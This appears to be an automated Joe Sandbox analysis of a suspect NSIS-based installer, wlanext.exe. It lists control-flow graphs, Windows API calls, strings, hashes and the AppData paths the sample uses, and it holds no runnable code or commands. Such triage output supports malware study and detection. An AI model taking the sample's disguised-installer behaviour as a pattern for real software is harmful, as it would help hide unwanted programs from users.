                                                          • Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 134 405205-405221 135 4053b0-4053b6 134->135 136 405227-4052ee GetDlgItem * 3 call 404074 call 404965 GetClientRect GetSystemMetrics SendMessageA * 2 134->136 137 4053e0-4053ec 135->137 138 4053b8-4053da GetDlgItem CreateThread CloseHandle 135->138 154 4052f0-40530a SendMessageA * 2 136->154 155 40530c-40530f 136->155 141 40540e-405414 137->141 142 4053ee-4053f4 137->142 138->137 146 405416-40541c 141->146 147 405469-40546c 141->147 144 4053f6-405409 ShowWindow * 2 call 404074 142->144 145 40542f-405436 call 4040a6 142->145 144->141 158 40543b-40543f 145->158 151 405442-405452 ShowWindow 146->151 152 40541e-40542a call 404018 146->152 147->145 149 40546e-405474 147->149 149->145 156 405476-405489 SendMessageA 149->156 159 405462-405464 call 404018 151->159 160 405454-40545d call 4050c7 151->160 152->145 154->155 162 405311-40531d SendMessageA 155->162 163 40531f-405336 call 40403f 155->163 164 405586-405588 156->164 165 40548f-4054bb CreatePopupMenu call 405fc2 AppendMenuA 156->165 159->147 160->159 162->163 173 405338-40534c ShowWindow 163->173 174 40536c-40538d GetDlgItem SendMessageA 163->174 164->158 171 4054d0-4054e6 TrackPopupMenu 165->171 172 4054bd-4054cd GetWindowRect 165->172 171->164 175 4054ec-405506 171->175 172->171 176 40535b 173->176 177 40534e-405359 ShowWindow 173->177 174->164 178 405393-4053ab SendMessageA * 2 174->178 179 40550b-405526 SendMessageA 175->179 180 405361-405367 call 404074 176->180 177->180 178->164 179->179 181 405528-405548 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 40554a-40556a SendMessageA 181->183 183->183 184 40556c-405580 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->164
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 00405264
                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405273
                                                          • GetClientRect.USER32(?,?,00000004), ref: 004052B0
                                                          • GetSystemMetrics.USER32(00000002), ref: 004052B7
                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
                                                          • ShowWindow.USER32(00000000,?), ref: 0040533F
                                                          • ShowWindow.USER32(?,00000008), ref: 00405353
                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405374
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405282
                                                            • Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                                                          • GetDlgItem.USER32(?,000003EC), ref: 004053C5
                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005199,00000000), ref: 004053D3
                                                          • CloseHandle.KERNELBASE(00000000), ref: 004053DA
                                                          • ShowWindow.USER32(00000000), ref: 004053FD
                                                          • ShowWindow.USER32(?,00000008), ref: 00405404
                                                          • ShowWindow.USER32(00000008), ref: 0040544A
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
                                                          • CreatePopupMenu.USER32 ref: 0040548F
                                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054A4
                                                          • GetWindowRect.USER32(?,000000FF), ref: 004054C4
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
                                                          • OpenClipboard.USER32(00000000), ref: 00405529
                                                          • EmptyClipboard.USER32 ref: 0040552F
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
                                                          • GlobalLock.KERNEL32(00000000), ref: 00405542
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040556F
                                                          • SetClipboardData.USER32(00000001,00000000), ref: 0040557A
                                                          • CloseClipboard.USER32 ref: 00405580
                                                          Strings
                                                          • Agitationers Setup: Completed, xrefs: 004054F5
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID: Agitationers Setup: Completed
                                                          • API String ID: 590372296-3562675674
                                                          • Opcode ID: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
                                                          • Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
                                                          • Opcode Fuzzy Hash: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
                                                          • Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68
                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(?,0042C0C0,0042BC78,00405A69,0042BC78,0042BC78,00000000,0042BC78,0042BC78,T'qu,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75712754,C:\Users\user\AppData\Local\Temp\), ref: 004062AE
                                                          • FindClose.KERNEL32(00000000), ref: 004062BA
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                                          • Instruction ID: 1e2c953ed1559e2f686ededff4fae2b078191910b4ed7f61f032671a7c701700
                                                          • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                                                          • Instruction Fuzzy Hash: ACD01236519020ABC21027787E0C84B7A589F053347118A7BF4A6F21E0C7348C6686DC

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 185 403b6b-403b7d 186 403b83-403b89 185->186 187 403cbe-403ccd 185->187 186->187 188 403b8f-403b98 186->188 189 403d1c-403d31 187->189 190 403ccf-403d17 GetDlgItem * 2 call 40403f SetClassLongA call 40140b 187->190 191 403b9a-403ba7 SetWindowPos 188->191 192 403bad-403bb0 188->192 194 403d71-403d76 call 40408b 189->194 195 403d33-403d36 189->195 190->189 191->192 197 403bb2-403bc4 ShowWindow 192->197 198 403bca-403bd0 192->198 204 403d7b-403d96 194->204 200 403d38-403d43 call 401389 195->200 201 403d69-403d6b 195->201 197->198 205 403bd2-403be7 DestroyWindow 198->205 206 403bec-403bef 198->206 200->201 216 403d45-403d64 SendMessageA 200->216 201->194 203 40400c 201->203 211 40400e-404015 203->211 209 403d98-403d9a call 40140b 204->209 210 403d9f-403da5 204->210 212 403fe9-403fef 205->212 214 403bf1-403bfd SetWindowLongA 206->214 215 403c02-403c08 206->215 209->210 219 403fca-403fe3 DestroyWindow EndDialog 210->219 220 403dab-403db6 210->220 212->203 218 403ff1-403ff7 212->218 214->211 221 403cab-403cb9 call 4040a6 215->221 222 403c0e-403c1f GetDlgItem 215->222 216->211 218->203 226 403ff9-404002 ShowWindow 218->226 219->212 220->219 227 403dbc-403e09 call 405fc2 call 40403f * 3 GetDlgItem 220->227 221->211 223 403c21-403c38 SendMessageA IsWindowEnabled 222->223 224 403c3e-403c41 222->224 223->203 223->224 228 403c43-403c44 224->228 229 403c46-403c49 224->229 226->203 255 403e13-403e4f ShowWindow KiUserCallbackDispatcher call 404061 EnableWindow 227->255 256 403e0b-403e10 227->256 232 403c74-403c79 call 404018 228->232 233 403c57-403c5c 229->233 234 403c4b-403c51 229->234 232->221 236 403c92-403ca5 SendMessageA 233->236 238 403c5e-403c64 233->238 234->236 237 403c53-403c55 234->237 236->221 237->232 241 403c66-403c6c call 40140b 238->241 242 403c7b-403c84 call 40140b 238->242 253 403c72 241->253 242->221 251 403c86-403c90 242->251 251->253 253->232 259 403e51-403e52 255->259 260 403e54 255->260 256->255 261 403e56-403e84 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403e86-403e97 SendMessageA 261->262 263 403e99 261->263 264 403e9f-403ed9 call 404074 call 403b4c call 405fa0 lstrlenA call 405fc2 SetWindowTextA call 401389 262->264 263->264 264->204 275 403edf-403ee1 264->275 275->204 276 403ee7-403eeb 275->276 277 403f0a-403f1e DestroyWindow 276->277 278 403eed-403ef3 276->278 277->212 280 403f24-403f51 CreateDialogParamA 277->280 278->203 279 403ef9-403eff 278->279 279->204 281 403f05 279->281 280->212 282 403f57-403fae call 40403f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->203 282->203 287 403fb0-403fc3 ShowWindow call 40408b 282->287 289 403fc8 287->289 289->212
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
                                                          • ShowWindow.USER32(?), ref: 00403BC4
                                                          • DestroyWindow.USER32 ref: 00403BD8
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
                                                          • GetDlgItem.USER32(?,?), ref: 00403C15
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403C30
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403CDE
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403CE8
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?,00000000), ref: 00403D53
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403DF9
                                                          • ShowWindow.USER32(00000000,?), ref: 00403E1A
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E2C
                                                          • EnableWindow.USER32(?,?), ref: 00403E47
                                                          • GetSystemMenu.USER32 ref: 00403E5D
                                                          • EnableMenuItem.USER32 ref: 00403E64
                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
                                                          • lstrlenA.KERNEL32(Agitationers Setup: Completed,?,Agitationers Setup: Completed,00000000), ref: 00403EB9
                                                          • SetWindowTextA.USER32(?,Agitationers Setup: Completed), ref: 00403EC8
                                                          • ShowWindow.USER32(?,0000000A), ref: 00403FFC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: Agitationers Setup: Completed
                                                          • API String ID: 3282139019-3562675674
                                                          • Opcode ID: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
                                                          • Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
                                                          • Opcode Fuzzy Hash: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
                                                          • Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 290 4037ce-4037e6 call 406338 293 4037e8-4037f8 call 405efe 290->293 294 4037fa-40382b call 405e87 290->294 303 40384e-403877 call 403a93 call 405a26 293->303 299 403843-403849 lstrcatA 294->299 300 40382d-40383e call 405e87 294->300 299->303 300->299 308 40387d-403882 303->308 309 4038fe-403906 call 405a26 303->309 308->309 310 403884-4038a8 call 405e87 308->310 315 403914-403939 LoadImageA 309->315 316 403908-40390f call 405fc2 309->316 310->309 317 4038aa-4038ac 310->317 319 4039ba-4039c2 call 40140b 315->319 320 40393b-40396b RegisterClassA 315->320 316->315 321 4038bd-4038c9 lstrlenA 317->321 322 4038ae-4038bb call 405963 317->322 334 4039c4-4039c7 319->334 335 4039cc-4039d7 call 403a93 319->335 323 403971-4039b5 SystemParametersInfoA CreateWindowExA 320->323 324 403a89 320->324 328 4038f1-4038f9 call 405938 call 405fa0 321->328 329 4038cb-4038d9 lstrcmpiA 321->329 322->321 323->319 327 403a8b-403a92 324->327 328->309 329->328 333 4038db-4038e5 GetFileAttributesA 329->333 338 4038e7-4038e9 333->338 339 4038eb-4038ec call 40597f 333->339 334->327 343 403a60-403a61 call 405199 335->343 344 4039dd-4039f7 ShowWindow call 4062ca 335->344 338->328 338->339 339->328 347 403a66-403a68 343->347 351 403a03-403a15 GetClassInfoA 344->351 352 4039f9-4039fe call 4062ca 344->352 349 403a82-403a84 call 40140b 347->349 350 403a6a-403a70 347->350 349->324 350->334 353 403a76-403a7d call 40140b 350->353 356 403a17-403a27 GetClassInfoA RegisterClassA 351->356 357 403a2d-403a50 DialogBoxParamA call 40140b 351->357 352->351 353->334 356->357 361 403a55-403a5e call 40371e 357->361 361->327
                                                          APIs
                                                            • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                            • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?,?,?,0040327F,0000000A), ref: 00406365
                                                          • lstrcatA.KERNEL32(1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000,00000002,75712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\wlanext.exe" ,00000000), ref: 00403849
                                                          • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank,1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000,00000002,75712754), ref: 004038BE
                                                          • lstrcmpiA.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank,1033,Agitationers Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Agitationers Setup: Completed,00000000), ref: 004038D1
                                                          • GetFileAttributesA.KERNEL32(: Completed), ref: 004038DC
                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank), ref: 00403925
                                                            • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                                                          • RegisterClassA.USER32(0042EBA0), ref: 00403962
                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
                                                          • CreateWindowExA.USER32 ref: 004039AF
                                                          • ShowWindow.USER32(00000005,00000000), ref: 004039E5
                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
                                                          • RegisterClassA.USER32(0042EBA0), ref: 00403A27
                                                          • DialogBoxParamA.USER32 ref: 00403A46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\AppData\Roaming\wlanext.exe" $.DEFAULT\Control Panel\International$.exe$1033$: Completed$Agitationers Setup: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                          • API String ID: 1975747703-3093739810
                                                          • Opcode ID: 28a6cb2043b9e6f93c7e77f288588c57623ef7bc68a152342dd55961b2cdd3aa
                                                          • Instruction ID: 8d2c68cc78653f9ce1e9d6bc3eacbdf8e43f68bf53c64efb99e72e2069adee56
                                                          • Opcode Fuzzy Hash: 28a6cb2043b9e6f93c7e77f288588c57623ef7bc68a152342dd55961b2cdd3aa
                                                          • Instruction Fuzzy Hash: BE61EA70340601BED620BB669D46F373EACEB54749F40447FF985B22E2CB7C59069A2D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 364 402d63-402db1 GetTickCount GetModuleFileNameA call 405b39 367 402db3-402db8 364->367 368 402dbd-402deb call 405fa0 call 40597f call 405fa0 GetFileSize 364->368 369 402f95-402f99 367->369 376 402df1 368->376 377 402ed8-402ee6 call 402cff 368->377 379 402df6-402e0d 376->379 383 402ee8-402eeb 377->383 384 402f3b-402f40 377->384 381 402e11-402e1a call 4031ae 379->381 382 402e0f 379->382 390 402e20-402e27 381->390 391 402f42-402f4a call 402cff 381->391 382->381 386 402eed-402f05 call 4031c4 call 4031ae 383->386 387 402f0f-402f39 GlobalAlloc call 4031c4 call 402f9c 383->387 384->369 386->384 414 402f07-402f0d 386->414 387->384 412 402f4c-402f5d 387->412 396 402ea3-402ea7 390->396 397 402e29-402e3d call 405af4 390->397 391->384 401 402eb1-402eb7 396->401 402 402ea9-402eb0 call 402cff 396->402 397->401 411 402e3f-402e46 397->411 408 402ec6-402ed0 401->408 409 402eb9-402ec3 call 4063ef 401->409 402->401 408->379 413 402ed6 408->413 409->408 411->401 417 402e48-402e4f 411->417 418 402f65-402f6a 412->418 419 402f5f 412->419 413->377 414->384 414->387 417->401 420 402e51-402e58 417->420 421 402f6b-402f71 418->421 419->418 420->401 422 402e5a-402e61 420->422 421->421 423 402f73-402f8e SetFilePointer call 405af4 421->423 422->401 424 402e63-402e83 422->424 427 402f93 423->427 424->384 426 402e89-402e8d 424->426 428 402e95-402e9d 426->428 429 402e8f-402e93 426->429 427->369 428->401 430 402e9f-402ea1 428->430 429->413 429->428 430->401
                                                          APIs
                                                          • GetTickCount.KERNEL32(75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402D74
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\wlanext.exe,00000400), ref: 00402D90
                                                            • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\AppData\Roaming\wlanext.exe,80000000,00000003), ref: 00405B3D
                                                            • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\wlanext.exe,C:\Users\user\AppData\Roaming\wlanext.exe,80000000,00000003), ref: 00402DDC
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\wlanext.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
                                                          • C:\Users\user\AppData\Roaming, xrefs: 00402DBE, 00402DC3, 00402DC9
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
                                                          • Null, xrefs: 00402E5A
                                                          • Inst, xrefs: 00402E48
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                                                          • soft, xrefs: 00402E51
                                                          • "C:\Users\user\AppData\Roaming\wlanext.exe" , xrefs: 00402D63
                                                          • Error launching installer, xrefs: 00402DB3
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000043E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.449083968.0000000000440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_400000_wlanext.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: "C:\Users\user\AppData\Roaming\wlanext.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\wlanext.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                          • API String ID: 4283519449-1007291733
                                                          • Opcode ID: 00a06a9a68cc67566cb868d600969febe4cd82948185b04c924e3ebd15472d20
                                                          • Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
                                                          • Opcode Fuzzy Hash: 00a06a9a68cc67566cb868d600969febe4cd82948185b04c924e3ebd15472d20
                                                          • Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 431 405fc2-405fcd 432 405fe0-405ff6 431->432 433 405fcf-405fde 431->433 434 4061e7-4061eb 432->434 435 405ffc-406007 432->435 433->432 436 4061f1-4061fb 434->436 437 406019-406023 434->437 435->434 438 40600d-406014 435->438 439 406206-406207 436->439 440 4061fd-406201 call 405fa0 436->440 437->436 441 406029-406030 437->441 438->434 440->439 443 406036-40606a 441->443 444 4061da 441->444 445 406070-40607a 443->445 446 406187-40618a 443->446 447 4061e4-4061e6 444->447 448 4061dc-4061e2 444->448 449 406094 445->449 450 40607c-406080 445->450 451 4061ba-4061bd 446->451 452 40618c-40618f 446->452 447->434 448->434 456 40609b-4060a2 449->456 450->449 453 406082-406086 450->453 457 4061cb-4061d8 lstrlenA 451->457 458 4061bf-4061c6 call 405fc2 451->458 454 406191-40619d call 405efe 452->454 455 40619f-4061ab call 405fa0 452->455 453->449 459 406088-40608c 453->459 469 4061b0-4061b6 454->469 455->469 461 4060a4-4060a6 456->461 462 4060a7-4060a9 456->462 457->434 458->457 459->449 465 40608e-406092 459->465 461->462 467 4060e2-4060e5 462->467 468 4060ab-4060ce call 405e87 462->468 465->456 470 4060f5-4060f8 467->470 471 4060e7-4060f3 GetSystemDirectoryA 467->471 481 4060d4-4060dd call 405fc2 468->481 482 40616e-406172 468->482 469->457 473 4061b8 469->473 475 406165-406167 470->475 476 4060fa-406108 GetWindowsDirectoryA 470->476 474 406169-40616c 471->474 478 40617f-406185 call 40620a 473->478 474->478 474->482 475->474 480 40610a-406114 475->480 476->475 478->457 484 406116-406119 480->484 485 40612e-406144 SHGetSpecialFolderLocation 480->485 481->474 482->478 487 406174-40617a lstrcatA 482->487 484->485 488 40611b-406122 484->488 489 406162 485->489 490 406146-406160 SHGetPathFromIDListA CoTaskMemFree 485->490 487->478 492 40612a-40612c 488->492 489->475 490->474 490->489 492->474 492->485
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,004050FF,Completed,00000000), ref: 004060ED
                                                          • GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,004050FF,Completed,00000000), ref: 00406100
                                                          • SHGetSpecialFolderLocation.SHELL32(004050FF,756F110C,?), ref: 0040613C
                                                          • SHGetPathFromIDListA.SHELL32(756F110C,: Completed), ref: 0040614A
                                                          • CoTaskMemFree.OLE32(756F110C), ref: 00406156
                                                          • lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
                                                          • lstrlenA.KERNEL32(: Completed,?,Completed,00000000,004050FF,Completed,00000000,00000000,00420FD4,756F110C), ref: 004061CC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.448925054.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 0000000B.00000002.448653942.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448981466.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.000000000042C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000B.00000002.448989993.0000000000430000.00000004.00000001.01000000.0000000A.sdmpDownload File
